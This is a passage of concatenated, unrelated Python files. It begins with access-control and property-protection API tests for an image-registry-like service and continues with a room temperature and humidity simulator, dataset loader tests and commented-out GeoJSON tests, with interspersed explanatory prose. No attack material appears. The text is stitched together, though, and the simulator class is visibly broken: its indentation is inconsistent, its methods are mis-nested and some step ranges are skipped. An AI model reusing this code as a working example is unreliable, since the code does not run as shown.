'X-Auth-Token': 'user1:tenant3:admin',
}
update_headers = {
'X-Subject-Meta-Name': 'MySubject2',
'X-Subject-Meta-Owner': 'tenant2',
}
update_headers.update(auth_headers)
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'PUT',
headers=update_headers)
self.assertEqual(200, response.status)
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'HEAD',
headers=auth_headers)
self.assertEqual(200, response.status)
self.assertEqual('tenant2', response['x-subject-meta-owner'])
def test_subject_visibility_to_different_users(self):
owners = ['admin', 'tenant1', 'tenant2', 'none']
visibilities = {'public': 'True', 'private': 'False'}
subject_ids = {}
for owner in owners:
for visibility, is_public in visibilities.items():
name = '%s-%s' % (owner, visibility)
headers = {
'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Name': name,
'X-Subject-Meta-Status': 'active',
'X-Subject-Meta-Is-Public': is_public,
'X-Subject-Meta-Owner': owner,
'X-Auth-Token': 'createuser:createtenant:admin',
}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST',
headers=headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
subject_ids[name] = data['subject']['id']
def list_subjects(tenant, role='', is_public=None):
auth_token = 'user:%s:%s' % (tenant, role)
headers = {'X-Auth-Token': auth_token}
path = "/v1/subjects/detail"
if is_public is not None:
path += '?is_public=%s' % is_public
response, content = self.http.request(path, 'GET', headers=headers)
self.assertEqual(200, response.status)
return jsonutils.loads(content)['subjects']
# 1. Known user sees public and their own subjects
subjects = list_subjects('tenant1')
self.assertEqual(5, len(subjects))
for subject in subjects:
self.assertTrue(subject['is_public'] or subject['owner'] == 'tenant1')
# 2. Unknown user sees only public subjects
subjects = list_subjects('none')
self.assertEqual(4, len(subjects))
for subject in subjects:
self.assertTrue(subject['is_public'])
# 3. Unknown admin sees only public subjects
subjects = list_subjects('none', role='admin')
self.assertEqual(4, len(subjects))
for subject in subjects:
self.assertTrue(subject['is_public'])
# 4. Unknown admin, is_public=none, shows all subjects
subjects = list_subjects('none', role='admin', is_public='none')
self.assertEqual(8, len(subjects))
# 5. Unknown admin, is_public=true, shows only public subjects
subjects = list_subjects('none', role='admin', is_public='true')
self.assertEqual(4, len(subjects))
for subject in subjects:
self.assertTrue(subject['is_public'])
# 6. Unknown admin, is_public=false, sees only private subjects
subjects = list_subjects('none', role='admin', is_public='false')
self.assertEqual(4, len(subjects))
for subject in subjects:
self.assertFalse(subject['is_public'])
# 7. Known admin sees public and their own subjects
subjects = list_subjects('admin', role='admin')
self.assertEqual(5, len(subjects))
for subject in subjects:
self.assertTrue(subject['is_public'] or subject['owner'] == 'admin')
# 8. Known admin, is_public=none, shows all subjects
subjects = list_subjects('admin', role='admin', is_public='none')
self.assertEqual(8, len(subjects))
# 9. Known admin, is_public=true, sees all public and their subjects
subjects = list_subjects('admin', role='admin', is_public='true')
self.assertEqual(5, len(subjects))
for subject in subjects:
self.assertTrue(subject['is_public'] or subject['owner'] == 'admin')
# 10. Known admin, is_public=false, sees all private subjects
subjects = list_subjects('admin', role='admin', is_public='false')
self.assertEqual(4, len(subjects))
for subject in subjects:
self.assertFalse(subject['is_public'])
def test_property_protections(self):
# Enable property protection
self.config(property_protection_file=self.property_file)
self.init()
CREATE_HEADERS = {
'X-Subject-Meta-Name': 'MySubject',
'X-Subject-Meta-disk_format': 'raw',
'X-Subject-Meta-container_format': 'ovf',
'X-Subject-Meta-Is-Public': 'True',
'X-Subject-Meta-Owner': 'tenant2',
}
# Create a subject for role member with extra properties
# Raises 403 since user is not allowed to create 'foo'
auth_headers = {
'X-Auth-Token': 'user1:tenant1:member',
}
custom_props = {
'x-subject-meta-property-foo': 'bar'
}
auth_headers.update(custom_props)
auth_headers.update(CREATE_HEADERS)
path = "/v1/subjects"
response, content = self.http.request(path, 'POST',
headers=auth_headers)
self.assertEqual(403, response.status)
# Create a subject for role member without 'foo'
auth_headers = {
'X-Auth-Token': 'user1:tenant1:member',
}
custom_props = {
'x-subject-meta-property-x_owner_foo': 'o_s_bar',
}
auth_headers.update(custom_props)
auth_headers.update(CREATE_HEADERS)
path = "/v1/subjects"
response, content = self.http.request(path, 'POST',
headers=auth_headers)
self.assertEqual(201, response.status)
# Returned subject entity should have 'x_owner_foo'
data = jsonutils.loads(content)
self.assertEqual('o_s_bar',
data['subject']['properties']['x_owner_foo'])
# Create a subject for role spl_role with extra properties
auth_headers = {
'X-Auth-Token': 'user1:tenant1:spl_role',
}
custom_props = {
'X-Subject-Meta-Property-spl_create_prop': 'create_bar',
'X-Subject-Meta-Property-spl_read_prop': 'read_bar',
'X-Subject-Meta-Property-spl_update_prop': 'update_bar',
'X-Subject-Meta-Property-spl_delete_prop': 'delete_bar'
}
auth_headers.update(custom_props)
auth_headers.update(CREATE_HEADERS)
path = "/v1/subjects"
response, content = self.http.request(path, 'POST',
headers=auth_headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
subject_id = data['subject']['id']
# Attempt to update two properties, one protected (spl_read_prop), the
# other not (spl_update_prop). The request should be forbidden.
auth_headers = {
'X-Auth-Token': 'user1:tenant1:spl_role',
}
custom_props = {
'X-Subject-Meta-Property-spl_read_prop': 'r',
'X-Subject-Meta-Property-spl_update_prop': 'u',
'X-Glance-Registry-Purge-Props': 'False'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(403, response.status)
# Attempt to create properties which are forbidden
auth_headers = {
'X-Auth-Token': 'user1:tenant1:spl_role',
}
custom_props = {
'X-Subject-Meta-Property-spl_new_prop': 'new',
'X-Glance-Registry-Purge-Props': 'True'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(403, response.status)
# Attempt to update, create and delete properties
auth_headers = {
'X-Auth-Token': 'user1:tenant1:spl_role',
}
custom_props = {
'X-Subject-Meta-Property-spl_create_prop': 'create_bar',
'X-Subject-Meta-Property-spl_read_prop': 'read_bar',
'X-Subject-Meta-Property-spl_update_prop': 'u',
'X-Glance-Registry-Purge-Props': 'True'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(200, response.status)
# Returned subject entity should reflect the changes
subject = jsonutils.loads(content)
# 'spl_update_prop' has update permission for spl_role
# hence the value has changed
self.assertEqual('u', subject['subject']['properties']['spl_update_prop'])
# 'spl_delete_prop' has delete permission for spl_role
# hence the property has been deleted
self.assertNotIn('spl_delete_prop', subject['subject']['properties'])
# 'spl_create_prop' has create permission for spl_role
# hence the property has been created
self.assertEqual('create_bar',
subject['subject']['properties']['spl_create_prop'])
# Subject Deletion should work
auth_headers = {
'X-Auth-Token': 'user1:tenant1:spl_role',
}
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'DELETE',
headers=auth_headers)
self.assertEqual(200, response.status)
# This subject should no longer be directly accessible
auth_headers = {
'X-Auth-Token': 'user1:tenant1:spl_role',
}
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'HEAD',
headers=auth_headers)
self.assertEqual(404, response.status)
def test_property_protections_special_chars(self):
# Enable property protection
self.config(property_protection_file=self.property_file)
self.init()
CREATE_HEADERS = {
'X-Subject-Meta-Name': 'MySubject',
'X-Subject-Meta-disk_format': 'raw',
'X-Subject-Meta-container_format': 'ovf',
'X-Subject-Meta-Is-Public': 'True',
'X-Subject-Meta-Owner': 'tenant2',
'X-Subject-Meta-Size': '0',
}
# Create a subject
auth_headers = {
'X-Auth-Token': 'user1:tenant1:member',
}
auth_headers.update(CREATE_HEADERS)
path = "/v1/subjects"
response, content = self.http.request(path, 'POST',
headers=auth_headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
subject_id = data['subject']['id']
# Verify both admin and unknown role can create properties marked with
# '@'
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
custom_props = {
'X-Subject-Meta-Property-x_all_permitted_admin': '1'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(200, response.status)
subject = jsonutils.loads(content)
self.assertEqual('1',
subject['subject']['properties']['x_all_permitted_admin'])
auth_headers = {
'X-Auth-Token': 'user1:tenant1:joe_soap',
}
custom_props = {
'X-Subject-Meta-Property-x_all_permitted_joe_soap': '1',
'X-Glance-Registry-Purge-Props': 'False'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(200, response.status)
subject = jsonutils.loads(content)
self.assertEqual(
'1', subject['subject']['properties']['x_all_permitted_joe_soap'])
# Verify both admin and unknown role can read properties marked with
# '@'
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'HEAD',
headers=auth_headers)
self.assertEqual(200, response.status)
self.assertEqual('1', response.get(
'x-subject-meta-property-x_all_permitted_admin'))
self.assertEqual('1', response.get(
'x-subject-meta-property-x_all_permitted_joe_soap'))
auth_headers = {
'X-Auth-Token': 'user1:tenant1:joe_soap',
}
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'HEAD',
headers=auth_headers)
self.assertEqual(200, response.status)
self.assertEqual('1', response.get(
'x-subject-meta-property-x_all_permitted_admin'))
self.assertEqual('1', response.get(
'x-subject-meta-property-x_all_permitted_joe_soap'))
# Verify both admin and unknown role can update properties marked with
# '@'
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
custom_props = {
'X-Subject-Meta-Property-x_all_permitted_admin': '2',
'X-Glance-Registry-Purge-Props': 'False'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(200, response.status)
subject = jsonutils.loads(content)
self.assertEqual('2',
subject['subject']['properties']['x_all_permitted_admin'])
auth_headers = {
'X-Auth-Token': 'user1:tenant1:joe_soap',
}
custom_props = {
'X-Subject-Meta-Property-x_all_permitted_joe_soap': '2',
'X-Glance-Registry-Purge-Props': 'False'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(200, response.status)
subject = jsonutils.loads(content)
self.assertEqual(
'2', subject['subject']['properties']['x_all_permitted_joe_soap'])
# Verify both admin and unknown role can delete properties marked with
# '@'
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
custom_props = {
'X-Subject-Meta-Property-x_all_permitted_joe_soap': '2',
'X-Glance-Registry-Purge-Props': 'True'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(200, response.status)
subject = jsonutils.loads(content)
self.assertNotIn('x_all_permitted_admin', subject['subject']['properties'])
auth_headers = {
'X-Auth-Token': 'user1:tenant1:joe_soap',
}
custom_props = {
'X-Glance-Registry-Purge-Props': 'True'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(200, response.status)
subject = jsonutils.loads(content)
self.assertNotIn('x_all_permitted_joe_soap',
subject['subject']['properties'])
# Verify neither admin nor unknown role can create a property protected
# with '!'
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
custom_props = {
'X-Subject-Meta-Property-x_none_permitted_admin': '1'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(403, response.status)
auth_headers = {
'X-Auth-Token': 'user1:tenant1:joe_soap',
}
custom_props = {
'X-Subject-Meta-Property-x_none_permitted_joe_soap': '1'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(403, response.status)
# Verify neither admin nor unknown role can read properties marked with
# '!'
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
custom_props = {
'X-Subject-Meta-Property-x_none_read': '1'
}
auth_headers.update(custom_props)
auth_headers.update(CREATE_HEADERS)
path = "/v1/subjects"
response, content = self.http.request(path, 'POST',
headers=auth_headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
subject_id = data['subject']['id']
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'HEAD',
headers=auth_headers)
self.assertEqual(200, response.status)
self.assertRaises(KeyError,
response.get, 'X-Subject-Meta-Property-x_none_read')
auth_headers = {
'X-Auth-Token': 'user1:tenant1:joe_soap',
}
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'HEAD',
headers=auth_headers)
self.assertEqual(200, response.status)
self.assertRaises(KeyError,
response.get, 'X-Subject-Meta-Property-x_none_read')
# Verify neither admin nor unknown role can update properties marked
# with '!'
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
custom_props = {
'X-Subject-Meta-Property-x_none_update': '1'
}
auth_headers.update(custom_props)
auth_headers.update(CREATE_HEADERS)
path = "/v1/subjects"
response, content = self.http.request(path, 'POST',
headers=auth_headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
subject_id = data['subject']['id']
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
custom_props = {
'X-Subject-Meta-Property-x_none_update': '2'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(403, response.status)
auth_headers = {
'X-Auth-Token': 'user1:tenant1:joe_soap',
}
custom_props = {
'X-Subject-Meta-Property-x_none_update': '2'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(403, response.status)
# Verify neither admin nor unknown role can delete properties marked
# with '!'
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
custom_props = {
'X-Subject-Meta-Property-x_none_delete': '1'
}
auth_headers.update(custom_props)
auth_headers.update(CREATE_HEADERS)
path = "/v1/subjects"
response, content = self.http.request(path, 'POST',
headers=auth_headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
subject_id = data['subject']['id']
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
custom_props = {
'X-Glance-Registry-Purge-Props': 'True'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(403, response.status)
auth_headers = {
'X-Auth-Token': 'user1:tenant1:joe_soap',
}
custom_props = {
'X-Glance-Registry-Purge-Props': 'True'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(403, response.status)
from .product_factory import ProductFactory
from .order_factory import OrderFactory
from .order_product_factory import OrderProductFactory
from random import randrange
class RoomSimulation():
day = 1339 # maximum step index
count = 0 # current step
temperature = 16.3
humidity = 19.8
morning = 719
people = 0
max_people = 6
# steps 0 - 719: daytime
# steps 720 - 1339: night
def genTemperature(self):
    # Daytime (steps 0 - 719) is split into 36-step segments; each
    # segment draws one of six plausible temperatures following a
    # rise-and-fall curve over the day. A single randrange(6) draw
    # indexes into the segment's pool, so a value is always assigned.
    if self.count <= self.morning:
        segments = [
            [16.4, 16.5, 16.7, 16.8, 16.6, 16.3],  # 16.3 - 17.8
            [16.7, 17.1, 17.0, 16.9, 16.8, 16.7],
            [17.0, 16.9, 17.3, 17.4, 16.9, 17.2],
            [17.4, 17.5, 17.8, 17.6, 17.7, 17.4],
            [17.5, 17.7, 17.9, 17.6, 17.7, 17.8],  # 17.5 - 18.6
            [17.8, 17.7, 17.9, 18.0, 18.1, 18.0],
            [18.0, 18.1, 18.2, 18.3, 18.4, 18.2],
            [18.3, 18.4, 18.5, 18.6, 18.5, 18.4],
            [18.8, 18.7, 18.9, 19.0, 19.1, 19.0],  # 18.6 - 20.0
            [19.2, 19.3, 19.4, 19.6, 19.7, 19.5],
            [20.0, 19.9, 19.8, 19.6, 19.7, 19.5],
            [19.2, 19.3, 19.4, 19.6, 19.7, 19.5],
            [19.0, 18.9, 18.7, 18.6, 18.7, 18.8],  # 17.5 - 19.0
            [18.3, 18.5, 18.4, 18.3, 18.5, 18.2],
            [18.0, 18.1, 17.9, 17.8, 18.0, 17.8],
            [17.8, 17.7, 17.6, 17.5, 17.7, 17.5],
            [17.6, 17.5, 17.6, 17.4, 17.7, 17.5],  # 16.3 - 17.8
            [17.4, 17.3, 17.2, 17.2, 17.1, 17.3],
            [16.8, 17.0, 17.1, 17.0, 16.8, 16.9],
            [16.7, 16.4, 16.3, 16.5, 16.5, 16.6],
        ]
        segment = min(self.count // 36, len(segments) - 1)
        self.temperature = segments[segment][randrange(6)]
        # Night (steps 720 - 1339) is not simulated; the counter wraps.
        self.count += 1
    elif self.count > self.morning:
        self.count = 0
        self.genTemperature()
    def genHumidity(self):
        if self.count <= self.morning:  # 18.8 - 24.0
            # DAY
            if self.count <= self.morning:
                if 0 < self.count <= 143:  # 19.8 - 22.5
                    if self.count // 36 < 1:  # first segment
                        # pick one of six plausible readings at random
                        self.humidity = (18.9, 18.8, 18.9, 19.7, 19.5, 19.3)[randrange(6)]
                    if self.count // 36 >= 1:  # second segment
                        self.humidity = (19.5, 19.6, 19.3, 19.5, 19.6, 19.7)[randrange(6)]
                    if self.count // 36 >= 2:  # third segment
                        self.humidity = (20.0, 20.5, 20.3, 20.7, 20.9, 20.7)[randrange(6)]
                    if self.count // 36 >= 3:  # fourth segment
                        self.humidity = (21.0, 20.9, 21.4, 21.5, 21.3, 21.1)[randrange(6)]
                elif 144 < self.count <= 287:  # 22.3 - 24.7
                    if self.count // 36 >= 4:  # first segment
                        self.humidity = (21.3, 21.5, 21.4, 21.6, 21.7, 21.5)[randrange(6)]
                    if self.count // 36 >= 5:  # second segment
                        self.humidity = (21.6, 21.7, 21.8, 21.6, 21.9, 22.1)[randrange(6)]
                    if self.count // 36 >= 6:  # third segment
                        self.humidity = (22.6, 22.5, 22.4, 22.4, 22.8, 22.7)[randrange(6)]
                    if self.count // 36 >= 7:  # fourth segment
                        self.humidity = (23.0, 23.1, 23.2, 23.4, 23.5, 23.7)[randrange(6)]
                elif 288 < self.count <= 431:  # 24.6 - 26
                    if self.count // 36 >= 8:  # first segment
                        self.humidity = (23.8, 23.7, 23.9, 24.0, 24.1, 24.2)[randrange(6)]
                    if self.count // 36 >= 9:  # second segment
                        self.humidity = (24.1, 24.3, 24.6, 24.7, 24.4, 24.9)[randrange(6)]
                    if self.count // 36 >= 10:  # third segment
                        self.humidity = (25.0, 24.8, 24.9, 24.5, 24.6, 24.7)[randrange(6)]
                    if self.count // 36 >= 11:  # fourth segment
                        self.humidity = (23.8, 23.7, 23.9, 24.0, 24.1, 24.2)[randrange(6)]
                elif 432 < self.count <= 575:  # 22.3 - 24.7
                    if self.count // 36 >= 12:  # first segment
                        self.humidity = (23.0, 23.1, 23.2, 23.4, 23.5, 23.7)[randrange(6)]
                    if self.count // 36 >= 13:  # second segment
                        self.humidity = (22.6, 22.5, 22.4, 22.4, 22.8, 22.7)[randrange(6)]
                    if self.count // 36 >= 14:  # third segment
                        self.humidity = (21.6, 21.7, 21.8, 21.6, 21.9, 22.1)[randrange(6)]
                    if self.count // 36 >= 15:  # fourth segment
                        self.humidity = (21.3, 21.5, 21.4, 21.6, 21.7, 21.5)[randrange(6)]
                elif 576 < self.count <= 719:  # 19.8 - 22.5
                    if self.count // 36 >= 16:  # first segment
                        self.humidity = (21.0, 20.9, 21.4, 21.5, 21.3, 21.1)[randrange(6)]
                    if self.count // 36 >= 17:  # second segment
                        self.humidity = (20.0, 20.5, 20.3, 20.7, 20.9, 20.7)[randrange(6)]
                    if self.count // 36 >= 18:  # third segment
                        self.humidity = (19.5, 19.6, 19.3, 19.5, 19.6, 19.7)[randrange(6)]
                    if self.count // 36 >= 19:  # fourth segment
                        self.humidity = (18.9, 18.8, 18.9, 19.7, 19.5, 19.3)[randrange(6)]
                # NIGHT
                # elif self.morning < self.count <= self.day:
                #     return False
                self.count += 1
        elif self.count > self.morning:
            self.count = 0
            self.genHumidity()
    def addPerson(self):
        if self.people < self.max_people:
            self.people += 1

    def removePerson(self):
        if self.people > 0:
            self.people -= 1
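The two generator methods above repeat one idea: every 36 ticks the simulation enters a new four-hour segment and draws one of six plausible sensor readings. A stand-alone sketch of that pattern (the function and table names below are hypothetical; the sample values are copied from the first two segments of `genHumidity`):

```python
from random import randrange

# Six candidate readings per segment, as in genTemperature / genHumidity.
# Values copied from the first two segments of genHumidity above.
SEGMENT_READINGS = {
    0: (18.9, 18.8, 18.9, 19.7, 19.5, 19.3),
    1: (19.5, 19.6, 19.3, 19.5, 19.6, 19.7),
}

def pick_reading(count):
    """Pick one of six plausible readings for the segment `count` falls in."""
    segment = count // 36  # 36 ticks per segment, as in the original
    values = SEGMENT_READINGS.get(segment, SEGMENT_READINGS[max(SEGMENT_READINGS)])
    return values[randrange(6)]
```

Drawing with a single `randrange` call guarantees exactly one value per tick, unlike six independent `if(randrange(6) is n)` rolls, which can match several times or not at all.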
# --- tests/test_loaders.py (returntocorp/inputset-generator, MIT license) ---
import os
from dotenv import load_dotenv

from r2c_isg.structures import Dataset

load_dotenv()

CACHE_DIR = '../.requests_cache'


def test_import_inputset():
    # test github
    ds = Dataset.import_inputset(
        'files/git_repo.json',
        registry='github',
        cache_dir=CACHE_DIR,
        debug=True,
        github_pat=os.getenv('GITHUB_PAT')
    )
    ds.update(**{'name': 'test', 'version': '1.0'})
    ds.backup('../test.p')
    ds = Dataset.restore('../test.p')
    ds.export_inputset('../test.json')

    ds = Dataset.import_inputset(
        'files/git_repo_commit.json',
        registry='github',
        cache_dir=CACHE_DIR,
        debug=True,
        github_pat=os.getenv('GITHUB_PAT')
    )
    ds.update(**{'name': 'test', 'version': '1.0'})
    ds.backup('../test.p')
    ds = Dataset.restore('../test.p')
    ds.export_inputset('../test.json')

    # test npm
    ds = Dataset.import_inputset(
        'files/name_version.json',
        registry='npm',
        cache_dir=CACHE_DIR,
        debug=True
    )
    ds.update(**{'name': 'test', 'version': '1.0'})
    ds.backup('../test.p')
    ds = Dataset.restore('../test.p')
    ds.export_inputset('../test.json')

    # test pypi
    ds = Dataset.import_inputset(
        'files/name_version.json',
        registry='pypi',
        cache_dir=CACHE_DIR,
        debug=True
    )
    ds.update(**{'name': 'test', 'version': '1.0'})
    ds.backup('../test.p')
    ds = Dataset.restore('../test.p')
    ds.export_inputset('../test.json')

    # test vanilla
    ds = Dataset.import_inputset(
        'files/http_url.json',
        cache_dir=CACHE_DIR,
        debug=True
    )
    ds.update(**{'name': 'test', 'version': '1.0'})
    ds.backup('../test.p')
    ds = Dataset.restore('../test.p')
    ds.export_inputset('../test.json')

    # cleanup files
    os.remove('../test.p')
    os.remove('../test.json')


def test_load_file():
    # test github
    ds = Dataset.load_file(
        'files/git_urls_commits.csv',
        registry='github',
        cache_dir=CACHE_DIR,
        debug=True,
        github_pat=os.getenv('GITHUB_PAT')
    )
    ds.update(**{'name': 'test', 'version': '1.0'})
    ds.backup('../test.p')
    ds = Dataset.restore('../test.p')
    ds.export_inputset('../test.json')

    # test npm
    ds = Dataset.load_file(
        'files/names_versions.csv',
        registry='npm',
        cache_dir=CACHE_DIR,
        debug=True
    )
    ds.update(**{'name': 'test', 'version': '1.0'})
    ds.backup('../test.p')
    ds = Dataset.restore('../test.p')
    ds.export_inputset('../test.json')

    # test pypi
    ds = Dataset.load_file(
        'files/names_versions.csv',
        registry='pypi',
        cache_dir=CACHE_DIR,
        debug=True
    )
    ds.update(**{'name': 'test', 'version': '1.0'})
    ds.backup('../test.p')
    ds = Dataset.restore('../test.p')
    ds.export_inputset('../test.json')

    # test vanilla
    ds = Dataset.load_file(
        'files/urls.csv',
        cache_dir=CACHE_DIR,
        debug=True
    )
    ds.update(**{'name': 'test', 'version': '1.0'})
    ds.backup('../test.p')
    ds = Dataset.restore('../test.p')
    ds.export_inputset('../test.json')

    # cleanup files
    os.remove('../test.p')
    os.remove('../test.json')


def test_load_weblist():
    # test github
    ds = Dataset.load_web(
        'top1kstarred',
        registry='github',
        from_type='list',
        cache_dir=CACHE_DIR,
        debug=True,
        github_pat=os.getenv('GITHUB_PAT')
    )
    ds.trim(10)
    ds.get_projects_meta()
    ds.get_project_versions(historical='latest')
    ds.update(**{'name': 'test', 'version': '1.0'})
    ds.backup('../test.p')
    ds = Dataset.restore('../test.p')
    ds.export_inputset('../test.json')

    # test npm
    ds = Dataset.load_web(
        'allbydependents',
        registry='npm',
        from_type='list',
        cache_dir=CACHE_DIR,
        debug=True
    )
    ds.trim(10)
    ds.get_projects_meta()
    ds.get_project_versions(historical='latest')
    ds.update(**{'name': 'test', 'version': '1.0'})
    ds.backup('../test.p')
    ds = Dataset.restore('../test.p')
    ds.export_inputset('../test.json')

    # test pypi
    ds = Dataset.load_web(
        'top4kyear',
        registry='pypi',
        from_type='list',
        cache_dir=CACHE_DIR,
        debug=True
    )
    ds.trim(10)
    ds.get_projects_meta()
    ds.get_project_versions(historical='latest')
    ds.update(**{'name': 'test', 'version': '1.0'})
    ds.backup('../test.p')
    ds = Dataset.restore('../test.p')
    ds.export_inputset('../test.json')

    # cleanup files
    os.remove('../test.p')
    os.remove('../test.json')
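Each registry case above runs the same persistence round-trip: update, back up to a pickle, restore, export to JSON, then delete the temp files. A minimal stand-alone sketch of that round-trip using only the standard library (this does not reimplement the `Dataset` API; `roundtrip` is an illustrative name):

```python
import json
import os
import pickle
import tempfile

def roundtrip(obj):
    """Back up to a pickle, restore, export as JSON, and clean up."""
    workdir = tempfile.mkdtemp()
    backup_path = os.path.join(workdir, 'test.p')
    export_path = os.path.join(workdir, 'test.json')
    with open(backup_path, 'wb') as f:   # cf. ds.backup('../test.p')
        pickle.dump(obj, f)
    with open(backup_path, 'rb') as f:   # cf. Dataset.restore('../test.p')
        restored = pickle.load(f)
    with open(export_path, 'w') as f:    # cf. ds.export_inputset('../test.json')
        json.dump(restored, f)
    with open(export_path) as f:
        exported = json.load(f)
    os.remove(backup_path)               # cleanup, as the tests do
    os.remove(export_path)
    return exported
```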
# --- disarm_gears/testing/test_json_helpers.py (disarm-platform/disarm-gears, MIT license) ---
#import json
#import pandas as pd
#from disarm_gears.util import json_helpers
#
#
#def test_geojson_encoder_3():
#
# df = pd.DataFrame({'lng': [1.1, 1.2, 1.3], 'lat': [-2.3, -2.0, -3.3]})
#
# # dumps = True
# js = json_helpers.geojson_encoder_3(df, layer_names=['layer_1', 'layer_2'], lng='lng', lat='lat', dumps=True)
# js_loads = json.loads(js)
#
# assert isinstance(js, str)
# assert isinstance(js_loads, dict)
#
# assert 'layer_names' in js_loads.keys()
# assert isinstance(js_loads['layer_names'], list)
# assert len(js_loads['layer_names']) == 2
# assert 'layer_1' in js_loads['layer_names']
# assert 'layer_2' in js_loads['layer_names']
#
# assert 'points' in js_loads.keys()
# assert isinstance(js_loads['points'], dict)
# assert len(js_loads['points']) == 2
# assert 'type' in js_loads['points']
# assert js_loads['points']['type'] == 'FeatureCollection'
# assert 'features' in js_loads['points']
# assert isinstance(js_loads['points']['features'], list)
# assert isinstance(js_loads['points']['features'][0], dict)
# assert len(js_loads['points']['features']) == df.shape[0]
# assert 'type' in js_loads['points']['features'][0]
# assert 'geometry' in js_loads['points']['features'][0]
# assert 'properties' in js_loads['points']['features'][0]
# assert js_loads['points']['features'][0]['type'] == 'Feature'
# assert 'coordinates' in js_loads['points']['features'][0]['geometry'].keys()
# assert 'type' in js_loads['points']['features'][0]['geometry'].keys()
#
# # dumps = False
# js_loads = json_helpers.geojson_encoder_3(df, layer_names=['layer_1', 'layer_2'], lng='lng', lat='lat', dumps=False)
#
# assert isinstance(js_loads, dict)
#
# assert 'layer_names' in js_loads.keys()
# assert isinstance(js_loads['layer_names'], list)
# assert len(js_loads['layer_names']) == 2
# assert 'layer_1' in js_loads['layer_names']
# assert 'layer_2' in js_loads['layer_names']
#
# assert 'points' in js_loads.keys()
# assert isinstance(js_loads['points'], dict)
# assert len(js_loads['points']) == 2
# assert 'type' in js_loads['points']
# assert js_loads['points']['type'] == 'FeatureCollection'
# assert 'features' in js_loads['points']
# assert isinstance(js_loads['points']['features'], list)
# assert isinstance(js_loads['points']['features'][0], dict)
# assert len(js_loads['points']['features']) == df.shape[0]
# assert 'type' in js_loads['points']['features'][0]
# assert 'geometry' in js_loads['points']['features'][0]
# assert 'properties' in js_loads['points']['features'][0]
# assert js_loads['points']['features'][0]['type'] == 'Feature'
# assert 'coordinates' in js_loads['points']['features'][0]['geometry'].keys()
# assert 'type' in js_loads['points']['features'][0]['geometry'].keys()
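The commented-out assertions above fully describe the shape `geojson_encoder_3` is expected to emit: a dict with `layer_names` plus a `points` FeatureCollection, one Feature per DataFrame row. A minimal encoder matching that shape, inferred from the assertions rather than taken from `disarm_gears` (`encode_points` is an illustrative name, and plain dicts stand in for the DataFrame):

```python
import json

def encode_points(rows, layer_names, lng='lng', lat='lat'):
    """Build the {'layer_names': ..., 'points': FeatureCollection} shape
    described by the assertions above (illustrative, not the library code)."""
    features = [
        {
            'type': 'Feature',
            'geometry': {'type': 'Point', 'coordinates': [r[lng], r[lat]]},
            'properties': {},
        }
        for r in rows
    ]
    return {
        'layer_names': layer_names,
        'points': {'type': 'FeatureCollection', 'features': features},
    }

# The structure survives a JSON round-trip, matching the dumps=True case.
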